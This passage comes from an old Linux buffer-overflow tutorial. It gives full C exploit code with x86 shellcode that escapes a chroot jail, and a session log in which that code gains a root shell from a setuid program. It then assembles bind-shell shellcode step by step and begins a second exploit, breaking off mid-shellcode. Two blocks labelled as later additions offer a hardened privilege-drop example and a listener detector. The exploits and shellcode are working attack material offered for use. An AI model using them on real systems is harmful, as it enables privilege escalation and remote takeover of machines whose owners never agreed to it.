      ----------------------------------------------------------------------------
      
      5.4 Exploit vulnerable3 program
       With this shellcode, you can easily write the exploit code.
      
      exploit3.c
      ----------------------------------------------------------------------------
      #include<stdio.h>
      #include<stdlib.h>
      #include<string.h>
      #include<unistd.h>
      
      #define ALIGN                             0
      #define OFFSET                            0
      #define RET_POSITION                   1024
      #define RANGE                            20
      #define NOP                            0x90
      
      char shellcode[]=
      "\xeb\x4f"                      /* jmp 0x4f              */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\x5e"                          /* popl %esi             */
      "\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
      "\xb0\x27"                      /* movb $0x27,%al        */
      "\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
      "\xfe\xc5"                      /* incb %ch              */
      "\xb1\xed"                      /* movb $0xed,%cl        */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
      "\xb0\x3d"                      /* movb $0x3d,%al        */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\xbb\xd2\xd1\xd0\xff"          /* movl $0xffd0d1d2,%ebx */
      "\xf7\xdb"                      /* negl %ebx             */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\xb1\x10"                      /* movb $0x10,%cl        */
      "\x56"                          /* pushl %esi            */
      "\x01\xce"                      /* addl %ecx,%esi        */
      "\x89\x1e"                      /* movl %ebx,(%esi)      */
      "\x83\xc6\x03"                  /* addl $0x3,%esi        */
      "\xe0\xf9"                      /* loopne -0x7           */
      "\x5e"                          /* popl %esi             */
      "\xb0\x3d"                      /* movb $0x3d,%al        */
      "\x8d\x5e\x10"                  /* leal 0x10(%esi),%ebx  */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\xac\xff\xff\xff"          /* call -0x54            */
      "/bin/sh";                      /* .string \"/bin/sh\"   */
      
      unsigned long get_sp(void)
      {
      __asm__("movl %esp,%eax");
      }
      
      void main(int argc,char **argv)
      {
      char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
      long addr;
      unsigned long sp;
      int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
      int i;
      
      if(argc>1)
      offset=atoi(argv[1]);
      
      sp=get_sp();
      addr=sp-offset;
      
      for(i=0;i<bsize;i+=4)
      {
      buff[i+ALIGN]=(addr&0x000000ff);
      buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
      buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
      buff[i+ALIGN+3]=(addr&0xff000000)>>24;
      }
      
      for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)
      buff[i]=NOP;
      
      ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
      for(i=0;i<strlen(shellcode);i++)
      *(ptr++)=shellcode[i];
      
      buff[bsize-1]='\0';
      
      printf("Jump to 0x%08x\n",addr);
      
      execl("./vulnerable3","vulnerable3",buff,0);
      }
      ----------------------------------------------------------------------------
      
      exploit the vulnerable3 program
      ----------------------------------------------------------------------------
      [ ohhara@ohhara ~ ] {1} $ ls -l vulnerable3
      -rwsr-xr-x   1 root     root         4348 Oct 18 15:06 vulnerable3*
      [ ohhara@ohhara ~ ] {2} $ ls -l exploit3
      -rwxr-xr-x   1 ohhara   cse          5059 Oct 18 17:13 exploit3*
      [ ohhara@ohhara ~ ] {3} $ ./exploit3
      Jump to 0xbfffec68
      Segmentation fault
      [ ohhara@ohhara ~ ] {4} $ ./exploit3 500
      Jump to 0xbfffea74
      Segmentation fault
      [ ohhara@ohhara ~ ] {5} $ ./exploit3 -500
      Jump to 0xbfffee5c
      bash# whoami
      root
      bash# pwd
      /home/ftp
      bash# cd /
      bash# pwd
      /
      bash# ls
      afs  boot  etc     home  lost+found  mnt   root  tmp  var
      bin  dev   export  lib   misc        proc  sbin  usr
      bash#
      ----------------------------------------------------------------------------
      
      5.5 What can you do with this technique?
       Normally you cannot access the root directory by attacking a chrooted
      setuid program with a buffer overflow. However, you can access all
      directories with this technique.
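
       A hardened counterpart to vulnerable3.c, added here as an example and not
      part of the original article: the escape in 5.2 depends on the process still
      being root when it calls chroot() again, so this version drops root for good
      after entering the jail and bounds the copy. The names copy_arg, enter_jail,
      JAIL_UID and JAIL_GID are assumptions made for the example.

```c
/* Added example: hardened counterpart of vulnerable3.c. Not from the article. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE            /* chroot(2), setgroups(2), strnlen(3) */
#endif
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Assumed unprivileged account for the jailed service (hypothetical values;
 * use a dedicated uid/gid on a real system). */
#define JAIL_UID ((uid_t)65534)
#define JAIL_GID ((gid_t)65534)

/* Bounded replacement for strcpy(buffer, argv[1]): oversized input is
 * rejected instead of being written past the end of dst.
 * Returns 0 on success, -1 if src does not fit (dst is left untouched). */
int copy_arg(char *dst, size_t dstsize, const char *src)
{
    size_t n;

    if (dst == NULL || src == NULL || dstsize == 0)
        return -1;
    n = strnlen(src, dstsize);
    if (n >= dstsize)              /* no room for the terminating NUL */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Enter the jail, then give up root permanently.
 * chroot(2) needs root privilege, so once the drop has happened the
 * mkdir("sh") / chroot("sh") / chroot("../../..") sequence can no longer
 * change the root directory. Returns 0 on success, -1 on any failure. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (dir == NULL || uid == 0 || gid == 0)
        return -1;                 /* "dropping" to root is not a drop */

    /* Move into the jail first so the working directory is inside it. */
    if (chdir(dir) != 0)
        return -1;
    if (chroot(".") != 0)
        return -1;
    if (chdir("/") != 0)
        return -1;

    /* Order matters: supplementary groups, then gid, then uid. */
    if (setgroups(0, NULL) != 0)
        return -1;
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)          /* as root this sets real, effective, saved */
        return -1;

    /* Verify the drop cannot be undone and chroot() is no longer usable. */
    if (setuid(0) == 0 || seteuid(0) == 0)
        return -1;
    if (chroot("/") == 0)
        return -1;
    if (getuid() != uid || geteuid() != uid)
        return -1;
    return 0;
}

int main(int argc, char **argv)
{
    char buffer[1024];

    if (enter_jail("/home/ftp", JAIL_UID, JAIL_GID) != 0) {
        perror("enter_jail");
        return 1;
    }
    if (argc > 1 && copy_arg(buffer, sizeof buffer, argv[1]) != 0) {
        fputs("argument too long\n", stderr);
        return 1;
    }
    return 0;
}
```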
       
      6 Open socket
       If you try to overflow a buffer in a daemon, you will see the daemon crash.
      In many cases, you have to execute a shell, open a socket, and connect it to
      your standard I/O. If you don't, you cannot get a shell. Even if you get a
      shell, the server crashes immediately, so you cannot issue any commands. In
      this case, you have to write complex shellcode that connects to your
      standard I/O.
      
      6.1 The example vulnerable program
      
      ----------------------------------------------------------------------------
      #include<string.h>
      
      int main(int argc,char **argv)
      {
      char buffer[1024];
      if(argc>1)
      strcpy(buffer,argv[1]);
      }
      ----------------------------------------------------------------------------
      
       This is the standard vulnerable program. I will use it for the socket
      opening buffer overflow, because I am too lazy to write an example daemon
      program. :) However, after you see the code, you will not be disappointed.
       
      6.2 Make open socket code
       If you can execute the code below, you can open a socket.
      
      opensocketasm1.c
      ----------------------------------------------------------------------------
      #include<unistd.h>
      #include<sys/socket.h>
      #include<netinet/in.h>
      
      int soc,cli,soc_len;
      struct sockaddr_in serv_addr;
      struct sockaddr_in cli_addr;
      
      int main()
      {
      if(fork()==0)
      {
      serv_addr.sin_family=AF_INET;
      serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
      serv_addr.sin_port=htons(30464);
      soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
      bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));
      listen(soc,1);
      soc_len=sizeof(cli_addr);
      cli=accept(soc,(struct sockaddr *)&cli_addr,&soc_len);
      dup2(cli,0);
      dup2(cli,1);
      dup2(cli,2);
      execl("/bin/sh","sh",0);
      }
      }
      ----------------------------------------------------------------------------
      
       This is difficult to write in assembly language. You can make the program
      simpler.
      
      opensocketasm2.c
      ----------------------------------------------------------------------------
      #include<unistd.h>
      #include<sys/socket.h>
      #include<netinet/in.h>
      
      int soc,cli;
      struct sockaddr_in serv_addr;
      
      int main()
      {
      if(fork()==0)
      {
      serv_addr.sin_family=2;
      serv_addr.sin_addr.s_addr=0;
      serv_addr.sin_port=0x77;
      soc=socket(2,1,6);
      bind(soc,(struct sockaddr *)&serv_addr,0x10);
      listen(soc,1);
      cli=accept(soc,0,0);
      dup2(cli,0);
      dup2(cli,1);
      dup2(cli,2);
      execl("/bin/sh","sh",0);
      }
      }
      ----------------------------------------------------------------------------
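
       An added detection example, not part of the original article: it parses
      /proc/net/tcp text and reports listening sockets on ports outside an
      allow-list, which is how the listener from opensocketasm1.c and
      opensocketasm2.c (port 30464, stored as 0x77 in sin_port on little-endian
      x86) shows up on a Linux host. The sample table, the allow-list and all
      function names are constructed for the example.

```c
/* Added example: spot unexpected TCP listeners in /proc/net/tcp output. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TCP_LISTEN 0x0A            /* "st" column value for LISTEN */

struct listener {
    uint32_t addr;                 /* local address as printed (0 = INADDR_ANY) */
    unsigned port;                 /* local port, host order */
    unsigned uid;                  /* owner of the socket */
};

/* Constructed sample in /proc/net/tcp format: sshd on 22, a local MTA on 25,
 * one established session, and a root-owned listener on 0x7700 = 30464. */
static const char SAMPLE_PROC_NET_TCP[] =
"  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
"   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001 1\n"
"   1: 00000000:7700 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1002 1\n"
"   2: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1003 1\n"
"   3: 0A00000A:0016 0B00000A:C350 01 00000000:00000000 00:00000000 00000000  1000        0 1004 1\n";

/* Port that ends up on the wire when little-endian x86 code stores `raw`
 * into sin_port without htons(), as opensocketasm2.c does with 0x77. */
unsigned wire_port(uint16_t raw)
{
    return ((raw & 0xffu) << 8) | (unsigned)(raw >> 8);
}

/* Parse one table row. Returns 1 and fills *out for a LISTEN socket,
 * 0 for the header, malformed rows and sockets in any other state. */
int parse_listener(const char *line, struct listener *out)
{
    unsigned laddr, lport, raddr, rport, st, uid;
    int n = sscanf(line, " %*d: %8x:%4x %8x:%4x %2x %*x:%*x %*x:%*x %*x %u",
                   &laddr, &lport, &raddr, &rport, &st, &uid);

    if (n != 6 || st != TCP_LISTEN)
        return 0;
    out->addr = laddr;
    out->port = lport;
    out->uid = uid;
    return 1;
}

/* Walk the table and collect listeners whose port is not in allowed[].
 * Returns the number found; at most maxhits of them are stored in hits[]. */
size_t find_unexpected(const char *table, const unsigned *allowed,
                       size_t nallowed, struct listener *hits, size_t maxhits)
{
    size_t found = 0;

    while (*table != '\0') {
        const char *eol = strchr(table, '\n');
        size_t len = eol ? (size_t)(eol - table) : strlen(table);
        char line[256];
        struct listener l;

        if (len < sizeof line) {   /* rows longer than the buffer are skipped */
            memcpy(line, table, len);
            line[len] = '\0';
            if (parse_listener(line, &l)) {
                size_t i;
                int ok = 0;
                for (i = 0; i < nallowed; i++)
                    if (allowed[i] == l.port)
                        ok = 1;
                if (!ok) {
                    if (found < maxhits)
                        hits[found] = l;
                    found++;
                }
            }
        }
        table += len + (eol ? 1 : 0);
    }
    return found;
}

int main(void)
{
    const unsigned allowed[] = { 22, 25 };   /* constructed allow-list */
    struct listener hits[8];
    size_t i, n = find_unexpected(SAMPLE_PROC_NET_TCP, allowed, 2, hits, 8);

    printf("sin_port 0x77 on x86 = TCP port %u\n", wire_port(0x77));
    for (i = 0; i < n && i < 8; i++)
        printf("unexpected listener: port %u addr %08x uid %u\n",
               hits[i].port, (unsigned)hits[i].addr, hits[i].uid);
    return n ? 1 : 0;
}
```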
      
      compile and disassemble
      ----------------------------------------------------------------------------
      [ ohhara@ohhara ~ ] {1} $ gcc -o opensocketasm2 -static opensocketasm2.c
      [ ohhara@ohhara ~ ] {2} $ gdb opensocketasm2
      GNU gdb 4.17
      Copyright 1998 Free Software Foundation, Inc.
      GDB is free software, covered by the GNU General Public License, and you are
      welcome to change it and/or distribute copies of it under certain conditions.
      Type "show copying" to see the conditions.
      There is absolutely no warranty for GDB.  Type "show warranty" for details.
      This GDB was configured as "i386-redhat-linux"...
      (gdb) disassemble fork
      Dump of assembler code for function fork:
      0x804ca90 <fork>:       movl   $0x2,%eax
      0x804ca95 <fork+5>:     int    $0x80
      0x804ca97 <fork+7>:     cmpl   $0xfffff001,%eax
      0x804ca9c <fork+12>:    jae    0x804cdc0 <__syscall_error>
      0x804caa2 <fork+18>:    ret    
      0x804caa3 <fork+19>:    nop    
      0x804caa4 <fork+20>:    nop    
      0x804caa5 <fork+21>:    nop    
      0x804caa6 <fork+22>:    nop    
      0x804caa7 <fork+23>:    nop    
      0x804caa8 <fork+24>:    nop    
      0x804caa9 <fork+25>:    nop    
      0x804caaa <fork+26>:    nop    
      0x804caab <fork+27>:    nop    
      0x804caac <fork+28>:    nop    
      0x804caad <fork+29>:    nop    
      0x804caae <fork+30>:    nop    
      0x804caaf <fork+31>:    nop    
      End of assembler dump.
      (gdb) disassemble socket
      Dump of assembler code for function socket:
      0x804cda0 <socket>:     movl   %ebx,%edx
      0x804cda2 <socket+2>:   movl   $0x66,%eax
      0x804cda7 <socket+7>:   movl   $0x1,%ebx
      0x804cdac <socket+12>:  leal   0x4(%esp,1),%ecx
      0x804cdb0 <socket+16>:  int    $0x80
      0x804cdb2 <socket+18>:  movl   %edx,%ebx
      0x804cdb4 <socket+20>:  cmpl   $0xffffff83,%eax
      0x804cdb7 <socket+23>:  jae    0x804cdc0 <__syscall_error>
      0x804cdbd <socket+29>:  ret    
      0x804cdbe <socket+30>:  nop    
      0x804cdbf <socket+31>:  nop    
      End of assembler dump.
      (gdb) disassemble bind
      Dump of assembler code for function bind:
      0x804cd60 <bind>:       movl   %ebx,%edx
      0x804cd62 <bind+2>:     movl   $0x66,%eax
      0x804cd67 <bind+7>:     movl   $0x2,%ebx
      0x804cd6c <bind+12>:    leal   0x4(%esp,1),%ecx
      0x804cd70 <bind+16>:    int    $0x80
      0x804cd72 <bind+18>:    movl   %edx,%ebx
      0x804cd74 <bind+20>:    cmpl   $0xffffff83,%eax
      0x804cd77 <bind+23>:    jae    0x804cdc0 <__syscall_error>
      0x804cd7d <bind+29>:    ret    
      0x804cd7e <bind+30>:    nop    
      0x804cd7f <bind+31>:    nop    
      End of assembler dump.
      (gdb) disassemble listen
      Dump of assembler code for function listen:
      0x804cd80 <listen>:     movl   %ebx,%edx
      0x804cd82 <listen+2>:   movl   $0x66,%eax
      0x804cd87 <listen+7>:   movl   $0x4,%ebx
      0x804cd8c <listen+12>:  leal   0x4(%esp,1),%ecx
      0x804cd90 <listen+16>:  int    $0x80
      0x804cd92 <listen+18>:  movl   %edx,%ebx
      0x804cd94 <listen+20>:  cmpl   $0xffffff83,%eax
      0x804cd97 <listen+23>:  jae    0x804cdc0 <__syscall_error>
      0x804cd9d <listen+29>:  ret    
      0x804cd9e <listen+30>:  nop    
      0x804cd9f <listen+31>:  nop    
      End of assembler dump.
      (gdb) disassemble accept
      Dump of assembler code for function __accept:
      0x804cd40 <__accept>:   movl   %ebx,%edx
      0x804cd42 <__accept+2>: movl   $0x66,%eax
      0x804cd47 <__accept+7>: movl   $0x5,%ebx
      0x804cd4c <__accept+12>:        leal   0x4(%esp,1),%ecx
      0x804cd50 <__accept+16>:        int    $0x80
      0x804cd52 <__accept+18>:        movl   %edx,%ebx
      0x804cd54 <__accept+20>:        cmpl   $0xffffff83,%eax
      0x804cd57 <__accept+23>:        jae    0x804cdc0 <__syscall_error>
      0x804cd5d <__accept+29>:        ret    
      0x804cd5e <__accept+30>:        nop    
      0x804cd5f <__accept+31>:        nop    
      End of assembler dump.
      (gdb) disassemble dup2  
      Dump of assembler code for function dup2:
      0x804cbe0 <dup2>:       movl   %ebx,%edx
      0x804cbe2 <dup2+2>:     movl   0x8(%esp,1),%ecx
      0x804cbe6 <dup2+6>:     movl   0x4(%esp,1),%ebx
      0x804cbea <dup2+10>:    movl   $0x3f,%eax
      0x804cbef <dup2+15>:    int    $0x80
      0x804cbf1 <dup2+17>:    movl   %edx,%ebx
      0x804cbf3 <dup2+19>:    cmpl   $0xfffff001,%eax
      0x804cbf8 <dup2+24>:    jae    0x804cdc0 <__syscall_error>
      0x804cbfe <dup2+30>:    ret    
      0x804cbff <dup2+31>:    nop    
      End of assembler dump.
      (gdb)
      ----------------------------------------------------------------------------
      
      fork(); code
      ----------------------------------------------------------------------------
      char code[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      socket(2,1,6); code
      ----------------------------------------------------------------------------
      /* %ecx is a pointer to all arguments.                   */
      char code[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xf1"                      /* movl %esi,%ecx        */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      /* The first argument.                                   */
      /* %esi has to reference free memory space before using  */
      /* this instruction.                                     */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      /* The second argument.                                  */
      "\xb0\x06"                      /* movb $0x6,%al         */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      /* The third argument.                                   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x01"                      /* movb $0x1,%bl         */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      bind(soc,(struct sockaddr *)&serv_addr,0x10); code
      ----------------------------------------------------------------------------
      /* %ecx is a pointer to all arguments.                   */
      char code[]=
      "\x89\xf1"                      /* movl %esi,%ecx        */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      /* %eax has to have soc value before using this          */
      /* instruction.                                          */
      /* the first argument.                                   */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
      /* serv_addr.sin_family=2                                */
      /* 2 is stored at 0xc(%esi).                             */
      "\xb0\x77"                      /* movb $0x77,%al        */
      "\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
      /* store port number at 0xe(%esi)                        */
      "\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
      /* %eax = the address of serv_addr                       */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      /* the second argument.                                  */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
      /* serv_addr.sin_addr.s_addr=0                           */
      /* 0 is stored at 0x10(%esi).                            */
      "\xb0\x10"                      /* movb $0x10,%al        */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      /* the third argument.                                   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x02"                      /* movb $0x2,%bl         */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      listen(soc,1); code
      ----------------------------------------------------------------------------
      /* %ecx is a pointer to all arguments.                   */
      char code[]=
      "\x89\xf1"                      /* movl %esi,%ecx        */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      /* %eax has to have soc value before using this          */
      /* instruction.                                          */
      /* the first argument.                                   */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      /* the second argument.                                  */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x04"                      /* movb $0x4,%bl         */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      accept(soc,0,0); code
      ----------------------------------------------------------------------------
      /* %ecx is a pointer to all arguments.                   */
      char code[]=
      "\x89\xf1"                      /* movl %esi,%ecx        */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      /* %eax has to have soc value before using this          */
      /* instruction.                                          */
      /* the first argument.                                   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      /* the second argument.                                  */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      /* the third argument.                                   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x05"                      /* movb $0x5,%bl         */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      dup2(cli,0); code
      ----------------------------------------------------------------------------
      /* the first argument is %ebx and the second argument    */
      /* is %ecx                                               */
      char code[]=
      /* %eax has to have cli value before using this          */
      /* instruction.                                          */
      "\x88\xc3"                      /* movb %al,%bl          */
      "\xb0\x3f"                      /* movb $0x3f,%al        */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      6.3 Modify the normal shellcode
      
       Merging the code fragments above into one shellcode takes some work.
      
      new shellcode
      ----------------------------------------------------------------------------
      char shellcode[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\xcd\x80"                      /* int $0x80             */
      "\x85\xc0"                      /* testl %eax,%eax       */
      "\x75\x43"                      /* jne 0x43              */
      /* fork()!=0 case                                        */
      /* It will call exit(0)                                  */
      /* To do that, it will jump twice, because exit(0) is    */
      /* located too far away.                                 */
      "\xeb\x43"                      /* jmp 0x43              */
      /* fork()==0 case                                        */
      /* It will call -0xa5                                    */
      /* To do that, it will jump twice, because call -0xa5    */
      /* is located too far away.                              */
      "\x5e"                          /* popl %esi             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xf1"                      /* movl %esi,%ecx        */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\xb0\x06"                      /* movb $0x6,%al         */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x01"                      /* movb $0x1,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
      "\xb0\x77"                      /* movb $0x77,%al        */
      "\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
      "\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
      "\xb0\x10"                      /* movb $0x10,%al        */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x02"                      /* movb $0x2,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\xeb\x04"                      /* jmp 0x4               */
      "\xeb\x55"                      /* jmp 0x55              */
      "\xeb\x5b"                      /* jmp 0x5b              */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x04"                      /* movb $0x4,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x05"                      /* movb $0x5,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\x88\xc3"                      /* movb %al,%bl          */
      "\xb0\x3f"                      /* movb $0x3f,%al        */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\xcd\x80"                      /* int $0x80             */
      "\xb0\x3f"                      /* movb $0x3f,%al        */
      "\xb1\x01"                      /* movb $0x1,%cl         */
      "\xcd\x80"                      /* int $0x80             */
      "\xb0\x3f"                      /* movb $0x3f,%al        */
      "\xb1\x02"                      /* movb $0x2,%cl         */
      "\xcd\x80"                      /* int $0x80             */
      "\xb8\x2f\x62\x69\x6e"          /* movl $0x6e69622f,%eax */
      /* %eax="/bin"                                           */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      "\xb8\x2f\x73\x68\x2f"          /* movl $0x2f68732f,%eax */
      /* %eax="/sh/"                                           */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
      "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\x5b\xff\xff\xff";         /* call -0xa5            */
      ----------------------------------------------------------------------------
      
      6.4  Exploit vulnerable4 program
       With this shellcode, you can easily write the exploit code. You also have
      to write code that connects to the socket.
      
      exploit4.c
      ----------------------------------------------------------------------------
      #include<stdio.h>
      #include<stdlib.h>
      #include<unistd.h>
      #include<netdb.h>
      #include<netinet/in.h>
      
      #define ALIGN                             0
      #define OFFSET                            0
      #define RET_POSITION                   1024
      #define RANGE                            20
      #define NOP                            0x90
      
      char shellcode[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\xcd\x80"                      /* int $0x80             */
      "\x85\xc0"                      /* testl %eax,%eax       */
      "\x75\x43"                      /* jne 0x43              */
      "\xeb\x43"                      /* jmp 0x43              */
      "\x5e"                          /* popl %esi             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xf1"                      /* movl %esi,%ecx        */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\xb0\x06"                      /* movb $0x6,%al         */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x01"                      /* movb $0x1,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
      "\xb0\x77"                      /* movb $0x77,%al        */
      "\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
      "\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
      "\xb0\x10"                      /* movb $0x10,%al        */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x02"                      /* movb $0x2,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\xeb\x04"                      /* jmp 0x4               */
      "\xeb\x55"                      /* jmp 0x55              */
      "\xeb\x5b"                      /* jmp 0x5b              */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x04"                      /* movb $0x4,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x05"                      /* movb $0x5,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\x88\xc3"                      /* movb %al,%bl          */
      "\xb0\x3f"                      /* movb $0x3f,%al        */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\xcd\x80"                      /* int $0x80             */
      "\xb0\x3f"                      /* movb $0x3f,%al        */
      "\xb1\x01"                      /* movb $0x1,%cl         */
